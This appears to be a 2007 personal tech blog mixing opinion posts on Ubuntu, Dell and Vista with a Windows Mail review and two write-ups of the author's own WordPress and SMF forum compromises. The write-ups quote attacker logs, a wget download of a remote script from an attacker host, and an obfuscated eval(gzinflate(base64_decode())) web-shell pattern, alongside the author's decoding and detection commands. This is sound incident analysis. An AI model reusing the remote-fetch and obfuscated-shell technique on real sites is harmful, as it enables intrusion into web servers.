Ubuntu Concedes Defeat, Canonical Throws in The Towel

While it’s not quite as dramatic as the title might suggest…

It is true. As it was a year ago, and still is today.

The success of Ubuntu Linux and Canonical is only one part truth… If success = being popular.

If you take your news from digg.com, cnet, or any other tech friendly site on the net, you will read one thing over and over again, every day of the year: Ubuntu is taking over the world, Vista does not work, and Microsoft is dying.

The facts are that 1) Ubuntu Linux is another popular linux distribution (at the head of a long line of distros that have seen their peaks), 2) Vista is the best OS so far, works well, and is a major seller, and 3) Microsoft revenues have been trending upward for as long as I can remember.

Consider also the facts that digg.com (net’s biggest anti-MS site) makes all its money from a Microsoft partnership [after Google dropped them], and that Ubuntu Linux is purely a product of Corporate sponsorship and development … and what do you have left?

It’s not “reality” because reality is not something that the pressure groups of self agendas can handle, and neither is the truth.

The truth is that 1) some people feel the need to be part of a group that needs to constantly reassure one another that “their way is the best way” and 2) tech sites need to drive traffic to generate ad revenues by spreading fear, uncertainty, and distrust.

Just today I was reading on a tech site how Canonical’s revenues are in the stratosphere. Right! Lets see…

This is the same day Shuttleworth goes on to claim that Canonical is not cash positive (they are spending more than they are taking in) and it will take another 5 years of funding [Source]… At only a 10 million a year burn rate.

In other news, there is no money to be made on desktop linux, but that’s okay, because everyone already new that. Hindsight is always 20/20.

Windows Mail for Vista, Not As Bad As I Thought.

Having used Windows XP for the last several years, I’ve recently decided to migrate to Windows Vista after purchasing a Dell 530 quad core PC with a 24 inch LCD.

My choices were to:
1. Keep using Thunderbird
2. Migrate to Outlook [Office]
3. Or try the native Windows Vista Mail application [“Windows Mail” is the replacement for Outlook Express].

The choice of using Thunderbird was the simplest of them all… But I wanted to try something new. The stability issues and a non-modern UI were the other decisive factors at play.

In the end, Windows Mail was the winner. But not an easy one.

Here is what I have discovered, which should have been documented somewhere but is not.

a) There is no way to import mbox format mail from other Mail Clients.

I used a temporary IMAP folder to copy/move messages from one mail client to the other; to bypass the obvious underlining format issues.

b) All POP accounts go into the main Local Inbox folder.

If you want to structurally segment different POP accounts, you will need to create Local sub-folders and create message rules that are conditional on the specific account. I can make a case for or against this [if this is a feature or a limit].

c) Message Rules do not apply to IMAP folders.

And there are no setting to automatically copy/move messages from select IMAP folders or accounts to the Local Folders. Again, I can make a case for or against this [both ways].

d) The Spam filter does not automatically apply to IMAP accounts and folders even when “Synchronization Settings” are set to “All messages” [which downloads the entire message body].

You actually have to open the message for the spam filter to process it. Though I think it might act on the header data it receives, proactively, or perhaps even on the message body when you select “Work Offline”.

All in all, after using Windows Mail I’ve actually become fond of it. It’s a great app and integrates well with the system.

Gmail IMAP folders use a “/” path in their structure. Example: The All Mail folder is “[Gmail]/All Mail”. Windows Mail does not allow you to use this character to specify the special IMAP folders. It still works, but looks a little odd. There are ways to get around this if it bothers you.

Another Day, Another WordPress Hack.

It could have been worse.

A few weeks ago we were hit with an SMF v1.1.3 exploit just a few days after the release of v1.1.4. The intruder inserted a slew of hidden spam links into the main ‘index.php’ file.

It took me a day or two to detect the modifications. And in this short time period forums.devside.net, which has been online since 2003, with a healthy Pagerank, had all it’s pages dropped from Google [with the exception of profiles and archives].

It’s a good thing I keep the forums on their own sub-domain, which Google treats more like a separate domain than anything else. A SE problem with the sub does not affect the main domain.

As a counter-measure to these “exploit app weakness, get shell, d/l script, profit” type of attacks, I have disabled most of the shell related PHP functions on the server.

And so I thought my problems where solved…

This time it’s my fault. I was running WordPress v2.2.2, with v2.2.3 having been released about a month ago. I’ve been checking the WP dashboard, but I must have missed it, or forgotten about it.

This time the intruder exploited one of many WP weaknesses, and inserted some type of a hidden “-1″ post that was nothing more than an attachment to this particular shell-script, executed with URL ‘/blog/?poncheg’…

WordPress Hack 1

WordPress Hack 2 - - [08/Oct/2007:07:10:20 -0400] "GET /wp-includes/js/tinymce/wp-mce-help.php HTTP/1.0" 404 520 "-" "-" - - [08/Oct/2007:07:10:25 -0400] "GET / HTTP/1.0" 200 12071 "-" "-" - - [08/Oct/2007:07:10:35 -0400] "GET /blog/wp-includes/js/tinymce/wp-mce-help.php HTTP/1.0" 200 7665 "-" "-" - - [08/Oct/2007:07:11:01 -0400] "POST /blog/xmlrpc.php HTTP/1.0" 200 4327 "-" "Opera" - - [08/Oct/2007:07:11:49 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1647 "http://www.devside.net/blog/wp-admin/options.php" "Opera" - - [08/Oct/2007:07:11:56 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 302 904 "http://www.devside.net/blog/wp-admin/options.php" "Opera" - - [08/Oct/2007:07:11:59 -0400] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 200 1554 "http://www.devside.net/
blog/upload.php?style=inline&tab=upload&post_id=-1" "Opera" - - [08/Oct/2007:07:12:14 -0400] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 302 509 "http://www.devside.net/b
log/upload.php?style=inline&tab=upload&post_id=-1" "Opera" - - [08/Oct/2007:07:12:25 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1629 "http://www.devside.net/blog/wp-admin/options.php" "Opera" - - [08/Oct/2007:07:12:30 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 302 904 "http://www.devside.net/blog/wp-admin/options.php" "Opera" - - [08/Oct/2007:07:12:33 -0400] "GET /blog/wp-admin/upgrade.php?step=1 HTTP/1.0" 200 1446 "-" "-"
... - - [08/Oct/2007:07:12:48 -0400] "GET /blog/?poncheg HTTP/1.0" 200 4789 "-" "Opera/9.22 (Windows NT 5.1; U; ru)"
JSC "VimpelCom" WLAN1 Moscow

Host name of is vps206.fastvps.ru

Luckily, in addition to the disabled PHP functions, I also had all my file/dir permissions under WP locked down, so it does not look like anything was modified. I still recreated the entire WP directory, just for safety sakes, and had to manually go into the database and delete the hidden attachment/post.

It’s not a matter of if you are going to get hacked, it’s a matter of when. So keep those web apps patched!

All Your SMF Forums Have Been Hacked. Have a Nice Day.

There is nothing quite like innocently checking over your httpd logs, attempting to figure out why the ‘preview’ feature of your forum s/w has stopped working [stuck on ‘fetching preview…’], only to come up to this…

--09:57:23--  http://kotzilla.jino-net.ru/include.txt
           => `include.txt'
Resolving kotzilla.jino-net.ru...
Connecting to kotzilla.jino-net.ru||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44,348 (43K) [text/plain]

    0K .......... .......... .......... .......... ...       100%   69.60 KB/s

09:57:25 (69.60 KB/s) - `include.txt' saved [44348/44348]

For those that do not know, the above translates to using wget, or the equivalent, to download a script to your system. With all this being done via Apache and usually from a simple URL designed to exploit a weakness in the given application.

My journey starts here.

Step 1.

find / -name include.txt

Nothing. Intruder must have deleted or renamed it.

Step 2.
Check http://kotzilla.jino-net.ru/include.txt for clues.

$login = ""; //Login
$pass = "";  //Pass
$md5_pass = ""; //If no pass then hash

Intruder must think this is clever. Once you decode and inflate the string, it returns…

eval(gzinflate(base64_decode('[another string to decode and inflate]')));

Step 3.
We do not want to execute any PHP code that is an unknown. The only option left is to write a PHP script to decode/inflate until we get at the center…

$string = "eval(gzinflate(base64_decode('HJ3HkqN...[removed]...f/79z/8A')));";
$pattern = '/^eval(gzinflate(base64_decode('([^');]*)/';
$count = 0;
while (preg_match($pattern, $string, $matches) )
$string = gzinflate(base64_decode($matches[1]));
echo "Decoded/Inflated:$countn";
echo "$string";

Seems to be some type of a web php shell script called C99madShell.

Step 4.
We need to locate the downloaded script…

find / -name '*.php' | xargs grep 'eval(gzinflate(base64_decode('

Not good!

Hack Shell 1

Hack Shell 2

Step 5.
Check logs.

grep 'readme.php' /.../forums.devside.net/access_log

Intruder was up to something no good. - - [26/Sep/2007:09:57:38 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4374 "-" "Opera/9.21 (Windows NT 5.1; U; ru)" - - [26/Sep/2007:09:58:00 -0400] "POST /Themes/readme.php HTTP/1.1" 200 3501 "http://forums.devside.net/Themes/readme.php" "Opera/9.21 (Windows NT 5.1; U; ru)" - - [27/Sep/2007:13:08:03 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4366 "-" "GoogleBotv2" - - [27/Sep/2007:13:09:24 -0400] "POST /Themes/readme.php HTTP/1.1" 200 4980 "http://forums.devside.net/Themes/readme.php" "GoogleBotv2"

Final Analysis.
I’ve search the logs, and I cannot locate anything helpful about the exploit. It does not seem to be an exploit in a URL, maybe POST related, or has something to do with the SMF theme function. I run no mods, and use the default theme, and do not allow users to switch themes.

The latest SMF 1.1.4 changelog does not state anything about fixed exploits.

I know the IP of the intruder [I’m sure just a hijacked system], the user_id on the forum, the mail account used for activation, but not much anything else.

Host name of is nzs.agh.edu.pl - - [26/Sep/2007:09:52:58 -0400] "GET /index.php?action=activate;u=1992;code=136bd7eb0f HTTP/1.1" 200 3409 "http://www.qcsalabama.com/mail/src/
read_body.php?mailbox=INBOX&passed_id=685&startMessage=1" "Opera/9.21 (Windows NT 5.1; U; ru)"

Checking the forum account, I see this user has also logged in via another IP [and this might be where the exploit starts]… - - [26/Sep/2007:09:48:07 -0400] "GET /index.php?action=register HTTP/1.1" 200 5961 "http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&
q=+%22powered+by+smf+1.1.3%22+site%3Anet&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv: Gecko/20070914 Firefox/"
... - - [26/Sep/2007:09:57:07 -0400] "POST //index.php?action=login2 HTTP/1.1" 302 851 "-" "Mozilla/4.0 (compatible; Windows 5.1)" - - [26/Sep/2007:09:57:09 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; Windows 5.1)" - - [26/Sep/2007:09:57:11 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 1527 "-" "Mozilla/4.0 (compatible; Windows 5.1)" - - [26/Sep/2007:09:57:23 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 307 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
Host name of is ppp135-75.tis-dialog.ru

I can understand phpBB getting rooted, I can understand WordPress being owned, but this is a first one for SMF.

And for anyone having odd issues with SMF [like getting stuck on ‘fetching preview…’]…

Smile. All your SMF forums have been hacked. Have a nice day.

Search ‘fetching preview’ on the SMF support forums. This hack/exploit might be going back years.

Ubuntu and Dell, a Mismatch Made in a Place Called Hell [IdeaStorm].

I’m going to keep this one short and simple, and to the point.

And I’m not even going to write anything.

Why the Dell/Ubuntu Deal Won’t Improve Linux’s Market Share

When you take a few steps back from the furor and zealotry and take a close look at whats happened here, you will quickly start to see the cracks. One problem is that Dell appears to be under the misguided impression that listening to the IdeaStorm community is the same as listening to customers. It’s not. Anyone can register and become an instant member of the IdeaStorm community. What Dell listened to wasn’t a cross-section of customers, but rather a pressure group.

There are a series of other pressure groups in operation on IdeaStorm right now, people who are putting their own agendas on the table and expecting Dell to carry them out

A wise and sound analysis that iterates everything mentioned here on the topic.

Ubuntu Kills Linux, Then Self, Dell Suspected of Foul Play.

I scream, you scream, we all scream for … DELL Ubuntu Linux?

*World* to Dell: We want desktop Linux!

Unless you’ve been living in a cave, you’ve probably heard the news:

The world wants Linux. And as we all know, the news can’t be wrong. Especially if it’s regurgitated over and over again on every tech site on the net.

Just one problem though…

This is Linux-fever journalism at its worst, and an example of a simple lie being easier for people to swallow than the complex truth.

Now I want you to take a deep breath at this point, because you’re about the get a sick feeling in your stomach. That feeling of utter hopelessness. And it’s going to come in shock waves, one after the other, over and over.

[You might want to stop reading at this point.]

Tsunami Wave #1.

And on Dell’s Ideastorm Web site, a staggering 41,210 users agreed with the thread, “Sell Linux PCs Worldwide — not only the United States”.

On another thread, 6,410 users agreed with the statement, “Make Dell Ubuntu PCs available to businesses and non-profits”.

They can’t even get the basic facts right…

When you vote on Dell’s IdeaStorm, your vote increases the total count by 10 points.

The reported figures so eminently talked about since day 1 are off by a factor of 10. That’s for every reported 10,000 users, only 1,000 votes were cast.

But don’t just stop there… Take into consideration that you get to register with a made up user name and password immediately, with no email confirmation or validation. You don’t even leave the page (thanks to JavaScript).

Log out, re-register again under the same exact IP address, and you get to vote once more, over and over.

The reported 100,000 users that started this mess in the first place on IdeaStorm, are at best 10,000 strong — assuming no manipulation was involved.

Not that the people doing the actual voting have any intention of getting a Ubuntu DELL anyways…

[While this quote is a joke, it sums up things quite nicely.]

I voted multiple times for Ubuntu on Dell’s ideaStorm so that others can have the opportunity to purchase it. As an Ubuntu advocate, I’ve done my part. It’s time for the consumers to do their part. Don’t blame me if consumers are too stupid to know what is best for them.

Tsunami Wave #2.

Dell has no intention of delivering Linux to the home user.

OEMs like Dell have razor thin margins. They live and die by the volume discounts, co-marketing funds, “Desktop Real Estate”, and leads provided by Microsoft.

The Ubuntu systems that Dell sells are nothing more than a type of a loss-leader designed to show the consumer that they are getting a better deal when buying the Windows counter-part… More features to select from, better promotions/deals, better components/upgrades, and sometimes cheaper upgrades.

If you’re part of the vast digg.com crowd that believes the US government perpetrated the 9/11 attacks, you’re probably also the type to believe that Dell will jeopardize its Microsoft relationship, and face the consequences, to sell an expected 20,000 Ubuntu systems [at a loss].

You don’t bite the hand that feeds you.

What’s Dell’s incentive here?… To generate publicity to further sell Windows Licenses and provide Microsoft with facts and figures to use in future campaigns.

More OEMs are cashing in on this profitable tactic every day.

Tsunami Wave #3.

By *pushing* Linux upon users that have no need for it, you are setting yourself up for failure.

The Microsoft Windows installed base is soon to cross the 1 Billion mark.

That user-base is very diverse: with different cultures, languages, and processes. Take into account everything Microsoft has had to work through by catering to everyones needs. Major roadblocks have been overcome. And what has Linux been put through on the Desktop? Relatively speaking… absolutely nothing.

Linux does not have a secret formula that makes it immune to growing pains. Switch the market share between Windows and Linux, and Linux will be downright unusable. From viruses, to backward compatibility issues, to UI problems, to everything else.

Let me state it one more time since it’s a point never mentioned: With an increasing market share, Linux will have the same exact growing pains and problems as Microsoft did and currently has.

Not to even mention that you are now catering to a mass that thinks the CD tray is a cup holder and the mouse is a foot pedal.

Landslide #1.

Vista Aiding Linux Desktop, Strategist Says

“Windows Vista has probably created the single biggest opportunity for the Linux desktop to take market share…”

How ofter do I hear this delusional statement in all it’s variations.

Vista has problems. So did Windows XP. As did Windows 2000. And 98, 95, 3.1. There _is_ a pattern here. Its called SP1 [Service Pack 1]. After which every version mentioned took off.

The saying goes: if your first version is not horribly broken, you’ve waited too long to release it.

The current release of Vista has allowed Microsoft to get feedback from a very diverse user-base. Feedback that is priceless, that cannot be had any other way. How else is progress made?

You don’t raise your child in a plastic bubble.

History repeats itself, and just as Linux has not been able to make it to the Desktop since the promised year 2000, Windows users are also not migrating to Linux pastures in mythical herds. If anything, XP sales are up and Microsoft is readying to sell millions of Vista Licenses, of which an estimated 6 million are being sold each month.

Tell me I’m wrong.